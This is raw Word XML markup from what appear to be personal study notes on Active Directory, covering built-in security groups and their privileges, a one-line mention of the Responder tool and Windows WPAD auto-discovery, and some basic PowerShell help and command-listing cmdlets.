          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7214">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Centralized identity management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF485D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF485D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>All users across the network can be configured from Active Directory with minimum effort.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E6CFC" w14:textId="1C2012CF" w:rsidR="003C7214" w:rsidRDefault="003C7214" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Managing security policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – You can configure security policies directly from Active Directory and apply them to users and computers across the network as needed</w:t>
      </w:r>
      <w:r w:rsidR="004501C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC7AD62" w14:textId="77777777" w:rsidR="004501C5" w:rsidRDefault="004501C5" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA09B5E" w14:textId="1A8173D1" w:rsidR="00E26C81" w:rsidRPr="00C766E3" w:rsidRDefault="00E26C81" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C766E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Security Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495983C" w14:textId="23185EBA" w:rsidR="00E26C81" w:rsidRDefault="00E26C81" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Domain Admins: Users of this group have administrative privileges over the entire domain. By default, they can administer any computer on the domain, including the DCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DA3CD8" w14:textId="39D5F288" w:rsidR="00E26C81" w:rsidRDefault="00E26C81" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Server Operators: Users in this group can administer Domain Controllers. They cannot change any administrative group memberships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA3A48" w14:textId="2A40C4BC" w:rsidR="00E26C81" w:rsidRDefault="00E26C81" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup Operators: Users in this group are allowed to access any file, ignoring their </w:t>
      </w:r>
      <w:r w:rsidR="009B4DA3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>permissions. They are used to perform backups of data on computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809924B" w14:textId="36934694" w:rsidR="009B4DA3" w:rsidRDefault="009B4DA3" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Operators: </w:t>
      </w:r>
      <w:r w:rsidR="008560DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Users in this group can create or modify other accounts in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8E95B" w14:textId="372424A4" w:rsidR="008560DB" w:rsidRDefault="008560DB" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Domain Users: Includes all existing user accounts in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA98E1A" w14:textId="623D1334" w:rsidR="008560DB" w:rsidRDefault="008560DB" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Domain Computers: Includes all existing computers in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22E6C1" w14:textId="318B07BF" w:rsidR="008560DB" w:rsidRDefault="008560DB" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Controllers: Includes </w:t>
      </w:r>
      <w:r w:rsidR="00F846B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>all existing DCs on the domain</w:t>
      </w:r>
      <w:r w:rsidR="00723533">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5686D1" w14:textId="77777777" w:rsidR="0074270C" w:rsidRDefault="0074270C" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66943D52" w14:textId="501582EF" w:rsidR="00A44C72" w:rsidRDefault="00A44C72" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED1F6D" w14:textId="77777777" w:rsidR="00A44C72" w:rsidRDefault="00A44C72" w:rsidP="007079F8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7082FF" w14:textId="1F2B2726" w:rsidR="00A44C72" w:rsidRDefault="00A44C72" w:rsidP="00A44C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>By default, Windows is configured to search for a Proxy Auto Config (PAC) file, via the Web Proxy Auto-Discovery (WPAD).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DB470C" w14:textId="2FE821F9" w:rsidR="00DE3B8A" w:rsidRPr="00447BB6" w:rsidRDefault="00DE3B8A" w:rsidP="00447BB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B54EBF8" w14:textId="77777777" w:rsidR="00447BB6" w:rsidRDefault="00447BB6" w:rsidP="00447BB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01DFE032" w14:textId="694B10B1" w:rsidR="00447BB6" w:rsidRDefault="006E2086" w:rsidP="006E2086">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>POWERSHELL SHIZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E97508" w14:textId="77777777" w:rsidR="006E2086" w:rsidRPr="00356FC8" w:rsidRDefault="006E2086" w:rsidP="006E2086">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C4C17F3" w14:textId="7A9A1318" w:rsidR="006E2086" w:rsidRPr="00356FC8" w:rsidRDefault="00744137" w:rsidP="006E2086">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Default PowerShell locations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69323A64" w14:textId="287F78FD" w:rsidR="00744137" w:rsidRPr="00356FC8" w:rsidRDefault="00356FC8" w:rsidP="00744137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C:\windows\syswow64\windowspowershell\v1</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rStyle w:val="r-crgep1"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>0\powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F700AB" w14:textId="6AA07D06" w:rsidR="00744137" w:rsidRDefault="00356FC8" w:rsidP="00744137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>C:\Windows\System32\WindowsPowerShell\v1</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rStyle w:val="r-crgep1"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00744137" w:rsidRPr="00356FC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>0\powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F00BFB6" w14:textId="12A4666E" w:rsidR="009E052D" w:rsidRDefault="009E052D" w:rsidP="00744137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502C8989" w14:textId="77777777" w:rsidR="009E052D" w:rsidRDefault="009E052D" w:rsidP="00744137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7473CF9A" w14:textId="7351E5FB" w:rsidR="009E052D" w:rsidRDefault="009E052D" w:rsidP="00744137">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Some basic </w:t>
      </w:r>
      <w:r w:rsidR="00E512AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB2EBD" w14:textId="08D96366" w:rsidR="009E052D" w:rsidRPr="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Help * #List everything loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CCE1F" w14:textId="661DC54F" w:rsidR="009E052D" w:rsidRPr="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Help process #List everything containing "process"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C3D5A" w14:textId="27F0C685" w:rsidR="009E052D" w:rsidRPr="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Help Get-Item -Full #Get full help</w:t>
      </w:r>
      <w:r w:rsidR="00E512AE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>about a topic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A611E" w14:textId="4FF00393" w:rsidR="009E052D" w:rsidRPr="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Help Get-Item -Examples #List examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC70F2" w14:textId="4B944D7E" w:rsidR="009E052D" w:rsidRPr="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Import-Module &lt;modulepath&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD225B" w14:textId="3D551280" w:rsidR="009E052D" w:rsidRDefault="009E052D" w:rsidP="009E052D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E052D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Command -Module &lt;modulename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E608A" w14:textId="58AF1F37" w:rsidR="005B0E1E" w:rsidRDefault="005B0E1E" w:rsidP="005B0E1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Command allows you to view a list of every Powershell</w:t>
      </w:r>
      <w:r w:rsidR="004B1E2E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmdlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F793A14" w14:textId="15CE09BE" w:rsidR="004225B9" w:rsidRDefault="004225B9" w:rsidP="005B0E1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Get-Command Get-*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043350B0" w14:textId="77777777" w:rsidR="00533443" w:rsidRDefault="00533443" w:rsidP="00533443">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F099590" w14:textId="77777777" w:rsidR="00533443" w:rsidRPr="00533443" w:rsidRDefault="00533443" w:rsidP="00533443">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A83670" w14:textId="77777777" w:rsidR="00744137" w:rsidRDefault="00744137" w:rsidP="006E2086">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CEEEC48" w14:textId="77777777" w:rsidR="00456FEC" w:rsidRPr="00447BB6" w:rsidRDefault="00456FEC" w:rsidP="006E2086">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00456FEC" w:rsidRPr="00447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AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="764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044A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="707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070B7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7DE6486"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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3339"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B87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84D9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="755819CA"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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01F76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="386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C340C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C84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4F5ED5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D97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D5613"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA100F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BD463E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B6CBF84"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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5A350A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1B5614A4"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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6E17AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E110C55C"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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706A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC0A4116"/>
    <w:lvl w:ilvl="0" w:tplc="4B2652B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733E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2192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177808">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="334890554">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="265699649">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="421492611">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="882718517">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="423453727">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1291590296">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1323656440">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="626590233">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1652638487">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="413430271">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="543248395">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1252622283">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1820877307">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1959408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70"/>
    <w:rsid w:val="00003B62"/>
    <w:rsid w:val="000041A0"/>
    <w:rsid w:val="00006CBE"/>
    <w:rsid w:val="00011D5B"/>
    <w:rsid w:val="00015FA6"/>
    <w:rsid w:val="00017229"/>
    <w:rsid w:val="0002143A"/>
    <w:rsid w:val="00022E1C"/>
    <w:rsid w:val="000238D0"/>
    <w:rsid w:val="00032F48"/>
    <w:rsid w:val="00036146"/>
    <w:rsid w:val="00046C6C"/>
    <w:rsid w:val="000525E4"/>
    <w:rsid w:val="00055050"/>
    <w:rsid w:val="000553BD"/>
    <w:rsid w:val="000609D7"/>
    <w:rsid w:val="00063639"/>
    <w:rsid w:val="000679BE"/>
    <w:rsid w:val="00070DE0"/>
    <w:rsid w:val="0008195E"/>
    <w:rsid w:val="00082E78"/>
    <w:rsid w:val="0008371E"/>
    <w:rsid w:val="00090651"/>
    <w:rsid w:val="0009076B"/>
    <w:rsid w:val="000966DB"/>
    <w:rsid w:val="000A43D0"/>
    <w:rsid w:val="000A4A25"/>
    <w:rsid w:val="000B0946"/>
    <w:rsid w:val="000B3C3C"/>
    <w:rsid w:val="000D1AB3"/>
    <w:rsid w:val="000D1B35"/>
    <w:rsid w:val="000D3257"/>
    <w:rsid w:val="000D3A47"/>
    <w:rsid w:val="000D635D"/>
    <w:rsid w:val="000D63C8"/>
    <w:rsid w:val="000D6702"/>
    <w:rsid w:val="000E051D"/>
    <w:rsid w:val="000E33B5"/>
    <w:rsid w:val="000F2126"/>
    <w:rsid w:val="001011F2"/>
    <w:rsid w:val="001104CA"/>
    <w:rsid w:val="001160EA"/>
    <w:rsid w:val="0011683E"/>
    <w:rsid w:val="001270EB"/>
    <w:rsid w:val="0013263D"/>
    <w:rsid w:val="001365C7"/>
    <w:rsid w:val="0014046B"/>
    <w:rsid w:val="00142ED8"/>
    <w:rsid w:val="00153049"/>
    <w:rsid w:val="001538D4"/>
    <w:rsid w:val="00165019"/>
    <w:rsid w:val="001714AB"/>
    <w:rsid w:val="00172105"/>
    <w:rsid w:val="0017386D"/>
    <w:rsid w:val="0018189D"/>
    <w:rsid w:val="00184676"/>
    <w:rsid w:val="001906B8"/>
    <w:rsid w:val="00191130"/>
    <w:rsid w:val="001919AA"/>
    <w:rsid w:val="001A04DF"/>
    <w:rsid w:val="001A3ED6"/>
    <w:rsid w:val="001A6453"/>
    <w:rsid w:val="001B63E3"/>
    <w:rsid w:val="001C3485"/>
    <w:rsid w:val="001C6F7D"/>
    <w:rsid w:val="001D2AC1"/>
    <w:rsid w:val="001D6237"/>
    <w:rsid w:val="001E02DF"/>
    <w:rsid w:val="001E5C7D"/>
    <w:rsid w:val="001E7379"/>
    <w:rsid w:val="00200538"/>
    <w:rsid w:val="00205440"/>
    <w:rsid w:val="00205745"/>
    <w:rsid w:val="00210E1D"/>
